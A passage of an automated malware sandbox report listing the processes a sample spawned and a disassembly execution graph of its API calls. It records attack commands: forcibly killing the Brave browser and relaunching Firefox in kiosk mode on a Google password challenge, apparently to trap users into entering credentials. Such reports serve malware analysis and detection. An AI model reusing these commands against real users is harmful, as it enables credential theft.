                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                            Start time:05:24:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                            Start time:05:24:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe"
                                                                                                                                                                                                                            Imagebase:0x350000
                                                                                                                                                                                                                            File size:2'810'368 bytes
                                                                                                                                                                                                                            MD5 hash:A55D697A530E905F6C6539469BA973BD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                            Start time:05:24:49
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                            Imagebase:0x7ff6d20e0000
                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                            Start time:05:24:50
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                            Imagebase:0x7ff6d20e0000
                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                            Start time:05:24:50
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                            Imagebase:0x7ff6d20e0000
                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            General

                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                            Start time:05:24:52
                                                                                                                                                                                                                            Start date:24/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2200 -prefMapHandle 2192 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c580837b-9763-4e9e-ad1e-338f434464c7} 2752 "\\.\pipe\gecko-crash-server-pipe.2752" 20ea916db10 socket
                                                                                                                                                                                                                            Imagebase:0x7ff6d20e0000
                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:3.3%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:2.8%
                                                                                                                                                                                                                              Total number of Nodes:755
                                                                                                                                                                                                                              Total number of Limit Nodes:24
                                                                                                                                                                                                                              execution_graph 12853 b08d30 12854 b08d7f 12853->12854 12855 b05c10 6 API calls 12854->12855 12856 b08d9a shared_ptr std::invalid_argument::invalid_argument 12855->12856 12908 b02170 12911 b1c6fc 12908->12911 12910 b0217a 12913 b1c70c 12911->12913 12914 b1c724 12911->12914 12913->12914 12915 b1cfbe 12913->12915 12914->12910 12916 b1ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12915->12916 12917 b1cfd0 12916->12917 12917->12913 12926 b042b0 12929 b03ac0 12926->12929 12928 b042bb shared_ptr 12930 b03af9 12929->12930 12931 b032d0 6 API calls 12930->12931 12933 b03c38 12930->12933 12935 b03b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 12930->12935 12931->12933 12932 b032d0 6 API calls 12936 b03c5f 12932->12936 12933->12932 12933->12936 12934 b03c68 12934->12928 12935->12928 12936->12934 12937 b03810 4 API calls 12936->12937 12938 b03cdb 12937->12938 12999 b077b0 13000 b077f1 shared_ptr 12999->13000 13001 b05c10 6 API calls 13000->13001 13003 b07883 shared_ptr 13000->13003 13001->13003 13002 b05c10 6 API calls 13005 b079e3 13002->13005 13003->13002 13004 b07953 shared_ptr std::invalid_argument::invalid_argument 13003->13004 13006 b05c10 6 API calls 13005->13006 13007 b07a15 shared_ptr 13006->13007 13008 b05c10 6 API calls 13007->13008 13013 b07aa5 shared_ptr std::invalid_argument::invalid_argument 13007->13013 13009 b07b7d 13008->13009 13010 b05c10 6 API calls 13009->13010 13011 b07ba0 13010->13011 13012 b05c10 6 API calls 13011->13012 13012->13013 13014 b087b0 13015 b087b6 13014->13015 13016 b087b8 GetFileAttributesA 13014->13016 13015->13016 13017 b087c4 13016->13017 13018 b147b0 13019 b14eed 13018->13019 13020 b14f59 shared_ptr std::invalid_argument::invalid_argument 13019->13020 13021 b07d30 7 API calls 13019->13021 13022 b150ed 13021->13022 13057 b08380 13022->13057 13024 b15106 13025 b05c10 6 API calls 13024->13025 13026 b15155 13025->13026 13027 b05c10 6 API calls 13026->13027 13028 b15171 13027->13028 13063 b09a00 13028->13063 13058 b083e5 __cftof 13057->13058 13059 b05c10 6 API calls 13058->13059 13062 b08403 shared_ptr std::invalid_argument::invalid_argument 13058->13062 13060 b08427 13059->13060 13061 b05c10 6 API calls 13060->13061 13061->13062 13062->13024 13064 b09a3f 13063->13064 13065 b05c10 6 API calls 13064->13065 13066 b09a47 13065->13066 13067 b08b30 6 API calls 13066->13067 13068 b09a58 13067->13068 12516 b087b2 12517 b087b6 12516->12517 12518 b087b8 GetFileAttributesA 12516->12518 12517->12518 12519 b087c4 12518->12519 12828 b0a9f4 12839 b09230 12828->12839 12830 b0aa03 shared_ptr 12831 b05c10 6 API calls 12830->12831 12837 b0aab3 shared_ptr 12830->12837 12832 b0aa65 12831->12832 12833 b05c10 6 API calls 12832->12833 12834 b0aa8d 12833->12834 12835 b05c10 6 API calls 12834->12835 12835->12837 12838 b0ad3c shared_ptr std::invalid_argument::invalid_argument 12837->12838 12849 b38ab6 12837->12849 12842 b09284 shared_ptr 12839->12842 12840 b05c10 6 API calls 12840->12842 12841 b09543 shared_ptr std::invalid_argument::invalid_argument 12841->12830 12842->12840 12844 b0944f shared_ptr 12842->12844 12843 b0979f shared_ptr 12846 b098b5 shared_ptr std::invalid_argument::invalid_argument 12843->12846 12847 b05c10 6 API calls 12843->12847 12844->12841 12844->12843 12845 b05c10 6 API calls 12844->12845 12845->12844 12846->12830 12848 b09927 shared_ptr std::invalid_argument::invalid_argument 12847->12848 12848->12830 12850 b38ad1 12849->12850 12851 b38868 4 API calls 12850->12851 12852 b38adb 12851->12852 12852->12837 12988 b04276 12989 b02410 5 API calls 12988->12989 12990 b0427f 12989->12990 12943 b09ab8 12945 b09acc 12943->12945 12946 b09b08 12945->12946 12948 b0a917 12946->12948 12950 b09b4b shared_ptr 12946->12950 12947 b0a953 Sleep CreateMutexA 12952 b0a98e 12947->12952 12948->12947 12949 b09b59 12950->12949 12951 b05c10 6 API calls 12950->12951 12953 b09b7c 12951->12953 12960 b08b30 12953->12960 12955 b09b8d 12956 b05c10 6 API calls 12955->12956 12957 b09cb1 12956->12957 12958 b08b30 6 API calls 12957->12958 12959 b09cc2 12958->12959 12961 b08b7c 12960->12961 12962 b05c10 6 API calls 12961->12962 12963 b08b97 shared_ptr std::invalid_argument::invalid_argument 12962->12963 12963->12955 12373 b0b1a0 12374 b0b1f2 12373->12374 12375 b0b3ad CoInitialize 12374->12375 12376 b0b3fa shared_ptr std::invalid_argument::invalid_argument 12375->12376 12625 b020a0 12628 b1c68b 12625->12628 12627 b020ac 12631 b1c3d5 12628->12631 12630 b1c69b 12630->12627 12632 b1c3e1 12631->12632 12633 b1c3eb 12631->12633 12634 b1c3be 12632->12634 12636 b1c39e 12632->12636 12633->12630 12644 b1cd0a 12634->12644 12636->12633 12640 b1ccd5 12636->12640 12638 b1c3d0 12638->12630 12641 b1cce3 InitializeCriticalSectionEx 12640->12641 12642 b1c3b7 12640->12642 12641->12642 12642->12630 12645 b1cd1f RtlInitializeConditionVariable 12644->12645 12645->12638 12860 b04120 12861 b0416a 12860->12861 12863 b041b2 std::invalid_argument::invalid_argument 12861->12863 12864 b03ee0 12861->12864 12865 b03f48 12864->12865 12868 b03f1e 12864->12868 12866 b03f58 12865->12866 12870 b02c00 12865->12870 12866->12863 12868->12863 12871 b02c0e 12870->12871 12877 b1b847 12871->12877 12873 b02c42 12874 b02c49 12873->12874 12883 b02c80 12873->12883 12874->12863 12876 b02c58 std::_Throw_future_error 12878 b1b854 12877->12878 12881 b1b873 Concurrency::details::_Reschedule_chore 12877->12881 12886 b1cb77 12878->12886 12880 b1b864 12880->12881 12888 b1b81e 12880->12888 12881->12873 12894 b1b7fb 12883->12894 12885 b02cb2 shared_ptr 12885->12876 12887 b1cb92 CreateThreadpoolWork 12886->12887 12887->12880 12889 b1b827 Concurrency::details::_Reschedule_chore 12888->12889 12892 b1cdcc 12889->12892 12891 b1b841 12891->12881 12893 b1cde1 TpPostWork 12892->12893 12893->12891 12895 b1b807 12894->12895 12896 b1b817 12894->12896 12895->12896 12898 b1ca78 12895->12898 12896->12885 12899 b1ca8d TpReleaseWork 12898->12899 12899->12896 13083 b03fe0 13084 b04022 13083->13084 13085 b040d2 13084->13085 13086 b0408c 13084->13086 13089 b04035 std::invalid_argument::invalid_argument 13084->13089 13087 b03ee0 3 API calls 13085->13087 13090 b035e0 13086->13090 13087->13089 13091 b03616 13090->13091 13095 b0364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 13091->13095 13096 b02ce0 13091->13096 13093 b0369e 13094 b02c00 3 API calls 13093->13094 13093->13095 13094->13095 13095->13089 13097 b02d1d 13096->13097 13098 b1bedf InitOnceExecuteOnce 13097->13098 13099 b02d46 13098->13099 13100 b02d51 std::invalid_argument::invalid_argument 13099->13100 13102 b02d88 13099->13102 13105 b1bef7 13099->13105 13100->13093 13103 b02440 4 API calls 13102->13103 13104 b02d9b 13103->13104 13104->13093 13106 b1bf03 std::_Throw_future_error 13105->13106 13107 b1bf73 13106->13107 13108 b1bf6a 13106->13108 13110 b02ae0 5 API calls 13107->13110 13112 b1be7f 13108->13112 13111 b1bf6f 13110->13111 13111->13102 13113 b1cc31 InitOnceExecuteOnce 13112->13113 13114 b1be97 13113->13114 13115 b1be9e 13114->13115 13116 b36cbb 4 API calls 13114->13116 13115->13111 13117 b1bea7 13116->13117 13117->13111 13201 b0af20 13202 b0af63 13201->13202 13213 b36660 13202->13213 13207 b3663f 4 API calls 13208 b0af80 13207->13208 13209 b3663f 4 API calls 13208->13209 13210 b0af98 __cftof 13209->13210 13219 b055f0 13210->13219 13212 b0b04e shared_ptr std::invalid_argument::invalid_argument 13214 b3a671 __cftof 4 API calls 13213->13214 13215 b0af69 13214->13215 13216 b3663f 13215->13216 13217 b3a671 __cftof 4 API calls 13216->13217 13218 b0af71 13217->13218 13218->13207 13220 b05610 13219->13220 13222 b05710 std::invalid_argument::invalid_argument 13220->13222 13223 b022c0 13220->13223 13222->13212 13226 b02280 13223->13226 13227 b02296 13226->13227 13230 b387f8 13227->13230 13233 b37609 13230->13233 13232 b022a4 13232->13220 13234 b37649 13233->13234 13238 b37631 __cftof std::invalid_argument::invalid_argument 13233->13238 13235 b3690a __cftof 4 API calls 13234->13235 13234->13238 13236 b37661 13235->13236 13239 b37bc4 13236->13239 13238->13232 13241 b37bd5 13239->13241 13240 b37be4 __cftof 13240->13238 13241->13240 13246 b38168 13241->13246 13251 b37dc2 13241->13251 13256 b37de8 13241->13256 13266 b37f36 13241->13266 13247 b38171 13246->13247 13248 b38178 13246->13248 13275 b37b50 13247->13275 13248->13241 13250 b38177 13250->13241 13252 b37dcb 13251->13252 13254 b37dd2 13251->13254 13253 b37b50 4 API calls 13252->13253 13255 b37dd1 13253->13255 13254->13241 13255->13241 13258 b37e09 __cftof 13256->13258 13259 b37def 13256->13259 13257 b37f69 13263 b37f77 13257->13263 13265 b37f8b 13257->13265 13283 b38241 13257->13283 13258->13241 13259->13257 13259->13258 13261 b37fa2 13259->13261 13259->13263 13261->13265 13279 b38390 13261->13279 13263->13265 13287 b386ea 13263->13287 13265->13241 13267 b37f69 13266->13267 13268 b37f4f 13266->13268 13269 b38241 4 API calls 13267->13269 13272 b37f77 13267->13272 13274 b37f8b 13267->13274 13268->13267 13270 b37fa2 13268->13270 13268->13272 13269->13272 13271 b38390 4 API calls 13270->13271 13270->13274 13271->13272 13273 b386ea 4 API calls 13272->13273 13272->13274 13273->13274 13274->13241 13276 b37b62 13275->13276 13277 b38ab6 4 API calls 13276->13277 13278 b37b85 13277->13278 13278->13250 13280 b383ab 13279->13280 13281 b383dd 13280->13281 13291 b3c88e 13280->13291 13281->13263 13284 b3825a 13283->13284 13298 b3d3c8 13284->13298 13286 b3830d 13286->13263 13288 b3875d std::invalid_argument::invalid_argument 13287->13288 13290 b38707 13287->13290 13288->13265 13289 b3c88e __cftof 4 API calls 13289->13290 13290->13288 13290->13289 13294 b3c733 13291->13294 13293 b3c8a6 13293->13281 13295 b3c743 13294->13295 13296 b3690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13295->13296 13297 b3c748 __cftof 13295->13297 13296->13297 13297->13293 13299 b3d3d8 __cftof 13298->13299 13300 b3d3ee 13298->13300 13299->13286 13300->13299 13301 b3d48a 13300->13301 13302 b3d485 13300->13302 13311 b3cbdf 13301->13311 13304 b3d4e4 13302->13304 13305 b3d4ae 13302->13305 13328 b3cef8 13304->13328 13307 b3d4b3 13305->13307 13308 b3d4cc 13305->13308 13317 b3d23e 13307->13317 13324 b3d0e2 13308->13324 13312 b3cbf1 13311->13312 13313 b3690a __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 13312->13313 13314 b3cc05 13313->13314 13315 b3cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 13314->13315 13316 b3cc0d __alldvrm __cftof _strrchr 13314->13316 13315->13316 13316->13299 13319 b3d26c 13317->13319 13318 b3d2a5 13318->13299 13319->13318 13320 b3d2de 13319->13320 13322 b3d2b7 13319->13322 13321 b3cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13320->13321 13321->13318 13323 b3d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13322->13323 13323->13318 13325 b3d10f 13324->13325 13326 b3d14e 13325->13326 13327 b3d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 13325->13327 13326->13299 13327->13326 13329 b3cf10 13328->13329 13330 b3cf75 13329->13330 13331 b3cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 13329->13331 13330->13299 13331->13330 13069 b09ba5 13070 b09ba7 13069->13070 13071 b05c10 6 API calls 13070->13071 13072 b09cb1 13071->13072 13073 b08b30 6 API calls 13072->13073 13074 b09cc2 13073->13074 12622 b36629 12623 b364c7 __cftof 3 API calls 12622->12623 12624 b3663a 12623->12624 12900 b1d111 12901 b1d121 12900->12901 12902 b1d12a 12901->12902 12904 b1d199 12901->12904 12905 b1d1a7 SleepConditionVariableCS 12904->12905 12907 b1d1c0 12904->12907 12905->12907 12907->12901 13075 b02b90 13076 b02bce 13075->13076 13077 b1b7fb TpReleaseWork 13076->13077 13078 b02bdb shared_ptr std::invalid_argument::invalid_argument 13077->13078 13332 b02b10 13333 b02b1a 13332->13333 13334 b02b1c 13332->13334 13335 b1c26a 5 API calls 13334->13335 13336 b02b22 13335->13336 13118 b187d0 13119 b1882a __cftof 13118->13119 13125 b19bb0 13119->13125 13123 b188d9 std::_Throw_future_error 13124 b1886c std::invalid_argument::invalid_argument 13138 b19ef0 13125->13138 13127 b19be5 13128 b02ce0 5 API calls 13127->13128 13129 b19c16 13128->13129 13142 b19f70 13129->13142 13131 b18854 13131->13124 13132 b043f0 13131->13132 13133 b1bedf InitOnceExecuteOnce 13132->13133 13134 b0440a 13133->13134 13135 b04411 13134->13135 13136 b36cbb 4 API calls 13134->13136 13135->13123 13137 b04424 13136->13137 13139 b19f0c 13138->13139 13140 b1c68b __Mtx_init_in_situ 2 API calls 13139->13140 13141 b19f17 13140->13141 13141->13127 13143 b19fef shared_ptr 13142->13143 13145 b1a058 13143->13145 13147 b1a210 13143->13147 13146 b1a03b 13146->13131 13148 b1a290 13147->13148 13154 b171d0 13148->13154 13150 b1a4be shared_ptr 13150->13146 13151 b1a2cc shared_ptr 13151->13150 13152 b03ee0 3 API calls 13151->13152 13153 b1a4a6 13152->13153 13153->13146 13155 b17211 13154->13155 13162 b03970 13155->13162 13157 b17446 std::invalid_argument::invalid_argument 13157->13151 13158 b172ad __cftof 13158->13157 13159 b1c68b __Mtx_init_in_situ 2 API calls 13158->13159 13160 b17401 13159->13160 13167 b02ec0 13160->13167 13163 b1c68b __Mtx_init_in_situ 2 API calls 13162->13163 13164 b039a7 13163->13164 13165 b1c68b __Mtx_init_in_situ 2 API calls 13164->13165 13166 b039e6 13165->13166 13166->13158 13168 b02f06 13167->13168 13175 b02f6f 13167->13175 13169 b1c6ac GetSystemTimePreciseAsFileTime 13168->13169 13170 b02f12 13169->13170 13171 b02f1d __Mtx_unlock 13170->13171 13172 b0301e 13170->13172 13174 b03024 13171->13174 13171->13175 13173 b1c26a 5 API calls 13172->13173 13173->13174 13176 b1c26a 5 API calls 13174->13176 13177 b1c6ac GetSystemTimePreciseAsFileTime 13175->13177 13186 b02fef 13175->13186 13178 b02fb9 13176->13178 13177->13178 13179 b1c26a 5 API calls 13178->13179 13180 b02fc0 __Mtx_unlock 13178->13180 13179->13180 13181 b1c26a 5 API calls 13180->13181 13182 b02fd8 __Cnd_broadcast 13180->13182 13181->13182 13183 b1c26a 5 API calls 13182->13183 13182->13186 13184 b0303c 13183->13184 13185 b1c6ac GetSystemTimePreciseAsFileTime 13184->13185 13196 b03080 shared_ptr __Mtx_unlock 13185->13196 13186->13157 13187 b031c5 13188 b1c26a 5 API calls 13187->13188 13189 b031cb 13188->13189 13190 b1c26a 5 API calls 13189->13190 13191 b031d1 13190->13191 13192 b1c26a 5 API calls 13191->13192 13198 b03193 __Mtx_unlock 13192->13198 13193 b031a7 std::invalid_argument::invalid_argument 13193->13157 13194 b1c26a 5 API calls 13195 b031dd 13194->13195 13196->13187 13196->13189 13196->13193 13197 b1c6ac GetSystemTimePreciseAsFileTime 13196->13197 13199 b0315f 13197->13199 13198->13193 13198->13194 13199->13187 13199->13191 13199->13198 13200 b1bd4c GetSystemTimePreciseAsFileTime 13199->13200 13200->13199 12520 b0a856 12521 b0a870 12520->12521 12522 b0a892 shared_ptr 12520->12522 12521->12522 12523 b0a94e 12521->12523 12527 b0a8a0 12522->12527 12536 b07d30 12522->12536 12526 b0a953 Sleep CreateMutexA 12523->12526 12525 b0a8ae 12525->12527 12529 b07d30 7 API calls 12525->12529 12528 b0a98e 12526->12528 12530 b0a8b8 12529->12530 12530->12527 12531 b07d30 7 API calls 12530->12531 12532 b0a8c2 12531->12532 12532->12527 12533 b07d30 7 API calls 12532->12533 12534 b0a8cc 12533->12534 12534->12527 12535 b07d30 7 API calls 12534->12535 12535->12527 12537 b07d96 __cftof 12536->12537 12574 b07ee8 shared_ptr std::invalid_argument::invalid_argument 12537->12574 12575 b05c10 12537->12575 12539 b07dd2 12540 b05c10 6 API calls 12539->12540 12541 b07dff shared_ptr 12540->12541 12542 b07ed3 GetNativeSystemInfo 12541->12542 12543 b07ed7 12541->12543 12541->12574 12542->12543 12544 b08019 12543->12544 12545 b07f3f 12543->12545 12543->12574 12547 b05c10 6 API calls 12544->12547 12546 b05c10 6 API calls 12545->12546 12548 b07f67 12546->12548 12549 b0804c 12547->12549 12551 b05c10 6 API calls 12548->12551 12550 b05c10 6 API calls 12549->12550 12552 b0806b 12550->12552 12553 b07f86 12551->12553 12555 b05c10 6 API calls 12552->12555 12585 b38bbe 12553->12585 12556 b080a3 12555->12556 12557 b05c10 6 API calls 12556->12557 12558 b080f4 12557->12558 12559 b05c10 6 API calls 12558->12559 12560 b08113 12559->12560 12561 b05c10 6 API calls 12560->12561 12562 b0814b 12561->12562 12563 b05c10 6 API calls 12562->12563 12564 b0819c 12563->12564 12565 b05c10 6 API calls 12564->12565 12566 b081bb 12565->12566 12567 b05c10 6 API calls 12566->12567 12568 b081f3 12567->12568 12569 b05c10 6 API calls 12568->12569 12570 b08244 12569->12570 12571 b05c10 6 API calls 12570->12571 12572 b08263 12571->12572 12573 b05c10 6 API calls 12572->12573 12573->12574 12574->12525 12576 b05c54 12575->12576 12588 b04b30 12576->12588 12578 b05d17 shared_ptr std::invalid_argument::invalid_argument 12578->12539 12579 b05c7b __cftof 12579->12578 12580 b05da7 RegOpenKeyExA 12579->12580 12581 b05e00 RegCloseKey 12580->12581 12582 b05e26 12581->12582 12583 b05ea6 shared_ptr std::invalid_argument::invalid_argument 12582->12583 12584 b05c10 4 API calls 12582->12584 12583->12539 12616 b38868 12585->12616 12587 b38bdc 12587->12574 12590 b04ce5 12588->12590 12591 b04b92 12588->12591 12590->12579 12591->12590 12592 b36da6 12591->12592 12593 b36dc2 __fassign 12592->12593 12594 b36db4 12592->12594 12593->12591 12597 b36d19 12594->12597 12598 b3690a __cftof 4 API calls 12597->12598 12599 b36d2c 12598->12599 12602 b36d52 12599->12602 12601 b36d3d 12601->12591 12603 b36d8f 12602->12603 12604 b36d5f 12602->12604 12605 b3b67d 4 API calls 12603->12605 12607 b36d6e __fassign 12604->12607 12608 b3b6a1 12604->12608 12605->12607 12607->12601 12609 b3690a __cftof 4 API calls 12608->12609 12611 b3b6be 12609->12611 12610 b3b6ce std::invalid_argument::invalid_argument 12610->12607 12611->12610 12613 b3f1bf 12611->12613 12614 b3690a __cftof 4 API calls 12613->12614 12615 b3f1df __cftof __fassign __freea std::invalid_argument::invalid_argument 12614->12615 12615->12610 12617 b3887a 12616->12617 12618 b3888f __cftof 12617->12618 12619 b3690a __cftof 4 API calls 12617->12619 12618->12587 12621 b388bf 12619->12621 12620 b36d52 4 API calls 12620->12621 12621->12618 12621->12620 12918 b0215a 12919 b1c6fc InitializeCriticalSectionEx 12918->12919 12920 b02164 12919->12920 12969 b09adc 12970 b09aea shared_ptr 12969->12970 12971 b0a917 12970->12971 12974 b09b4b shared_ptr 12970->12974 12972 b0a953 Sleep CreateMutexA 12971->12972 12973 b0a98e 12972->12973 12975 b09b59 12974->12975 12976 b05c10 6 API calls 12974->12976 12977 b09b7c 12976->12977 12978 b08b30 6 API calls 12977->12978 12979 b09b8d 12978->12979 12980 b05c10 6 API calls 12979->12980 12981 b09cb1 12980->12981 12982 b08b30 6 API calls 12981->12982 12983 b09cc2 12982->12983 13079 b03f9f 13080 b03fb6 13079->13080 13081 b03fad 13079->13081 13082 b02410 5 API calls 13081->13082 13082->13080 12377 b08780 12378 b08786 12377->12378 12384 b36729 12378->12384 12380 b087a6 12383 b087a0 12391 b36672 12384->12391 12386 b08793 12386->12380 12387 b367b7 12386->12387 12388 b367c3 __cftof 12387->12388 12390 b367cd __cftof 12388->12390 12407 b36740 12388->12407 12390->12383 12392 b3667e __cftof 12391->12392 12394 b36685 __cftof 12392->12394 12395 b3a8c3 12392->12395 12394->12386 12396 b3a8cf __cftof 12395->12396 12399 b3a967 12396->12399 12398 b3a8ea 12398->12394 12401 b3a98a 12399->12401 12402 b3a9d0 __freea 12401->12402 12403 b3d82f 12401->12403 12402->12398 12404 b3d83c __cftof 12403->12404 12405 b3d87a 12404->12405 12406 b3d867 RtlAllocateHeap 12404->12406 12405->12402 12406->12404 12406->12405 12408 b36762 12407->12408 12409 b3674d __cftof __freea 12407->12409 12408->12409 12411 b3a038 12408->12411 12409->12390 12412 b3a050 12411->12412 12414 b3a075 12411->12414 12412->12414 12415 b40439 12412->12415 12414->12409 12416 b40445 __cftof 12415->12416 12418 b4044d __cftof __dosmaperr 12416->12418 12419 b4052b 12416->12419 12418->12414 12420 b4054d 12419->12420 12421 b40551 __cftof __dosmaperr 12419->12421 12420->12421 12425 b400d2 12420->12425 12421->12418 12427 b400e3 12425->12427 12426 b40106 12426->12421 12429 b3fcc0 12426->12429 12427->12426 12436 b3a671 12427->12436 12430 b3fd0d 12429->12430 12474 b3690a 12430->12474 12433 b3c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12435 b3fd1c __cftof 12433->12435 12434 b3ffbc std::invalid_argument::invalid_argument 12434->12421 12435->12433 12435->12434 12482 b3b67d 12435->12482 12437 b3a67b __cftof 12436->12437 12438 b3d82f __cftof RtlAllocateHeap 12437->12438 12441 b3a694 __cftof __freea 12437->12441 12438->12441 12439 b3a722 12439->12426 12441->12439 12443 b38bec 12441->12443 12444 b38bf1 __cftof 12443->12444 12448 b38bfc __cftof 12444->12448 12449 b3d634 12444->12449 12463 b365ed 12448->12463 12451 b3d640 __cftof 12449->12451 12450 b3d69c __cftof 12450->12448 12451->12450 12452 b3d726 12451->12452 12453 b3d81b __cftof 12451->12453 12454 b3d751 __cftof 12451->12454 12452->12454 12466 b3d62b 12452->12466 12455 b365ed __cftof 3 API calls 12453->12455 12454->12450 12457 b3d7a5 12454->12457 12459 b3a671 __cftof 4 API calls 12454->12459 12456 b3d82e 12455->12456 12457->12450 12462 b3a671 __cftof 4 API calls 12457->12462 12459->12457 12461 b3d62b __cftof 4 API calls 12461->12454 12462->12450 12469 b364c7 12463->12469 12467 b3a671 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12466->12467 12468 b3d630 12467->12468 12468->12461 12470 b364d5 __cftof 12469->12470 12471 b36520 12470->12471 12472 b3652b __cftof GetPEB ExitProcess GetPEB 12470->12472 12473 b3652a 12472->12473 12475 b36921 12474->12475 12476 b3692a 12474->12476 12475->12435 12476->12475 12477 b3a671 __cftof 4 API calls 12476->12477 12478 b3694a 12477->12478 12487 b3b5fb 12478->12487 12483 b3a671 __cftof 4 API calls 12482->12483 12484 b3b688 12483->12484 12485 b3b5fb __cftof 4 API calls 12484->12485 12486 b3b698 12485->12486 12486->12435 12488 b36960 12487->12488 12489 b3b60e 12487->12489 12491 b3b628 12488->12491 12489->12488 12495 b3f5ab 12489->12495 12492 b3b650 12491->12492 12493 b3b63b 12491->12493 12492->12475 12493->12492 12502 b3e6b1 12493->12502 12496 b3f5b7 __cftof 12495->12496 12497 b3a671 __cftof 4 API calls 